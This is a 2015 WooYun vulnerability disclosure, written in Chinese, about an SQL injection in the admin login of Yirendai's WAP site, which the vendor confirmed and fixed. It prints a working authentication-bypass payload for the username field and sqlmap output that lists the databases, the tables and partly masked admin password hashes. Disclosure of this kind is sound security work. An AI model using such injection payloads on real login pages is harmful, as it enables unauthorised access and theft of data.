当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110037

漏洞标题:宜人贷某站SQL注入漏洞

相关厂商:宜人贷

漏洞作者: 小健客

提交时间:2015-04-24 07:40

修复时间:2015-04-27 19:06

公开时间:2015-04-27 19:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-04-27: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

宜人贷确认漏洞的速度很快,rank给得也合理

详细说明:

wap.yirendai.com 这个站点后台登陆的地方存在sql注入,可绕过密码登陆后台。
http://wap.yirendai.com/yixin/index.php 用户名 admin' or 's'='s 密码随意

14.png


跑出点数据出来,证明一下:

available databases [2]:                                                       
[*] information_schema
[*] wapjingyingdai


Database: wapjingyingdai                                                       
[17 tables]
+----------------+
| admin |
| channel |
| channel_view |
| consulting |
| dic |
| income |
| phone_area |
| qxs_admin |
| qxs_channel |
| qxs_consulting |
| qxs_views |
| yrd_admin |
| yrd_channel |
| yrd_consulting |
| yrd_dic |
| yrd_income |
| yrd_views |
+----------------+


Table: admin
[2 entries]
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 0d9ac792ea4********************* |
| adminnew | a82bddfc849********************* |
+----------+----------------------------------+

漏洞证明:

修复方案:

听说你们有自己的安全团队,他们知道

版权声明:转载请注明来源 小健客@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-24 10:58

厂商回复:

NICE FOUND 地址是用字典找到的么?礼物马上发送

最新状态:

2015-04-27:已修复。感谢。


漏洞评价:

评论

  1. 2015-04-24 11:30 | yirendai(乌云厂商)

    @小健客 应该没有使用预处理的方式查询,你这数据是基于error-based跑出来的么?

  2. 2015-04-24 12:44 | 小健客 ( 实习白帽子 | Rank:67 漏洞数:21 | 面具下不止是肉体,还有思想,而思想是不怕...)

    @宜人贷 是的 直接丢sqlmap

  3. 2015-05-09 09:59 | 清清侠 ( 普通白帽子 | Rank:128 漏洞数:15 | %0d%0a)

    我想知道礼物是什么。。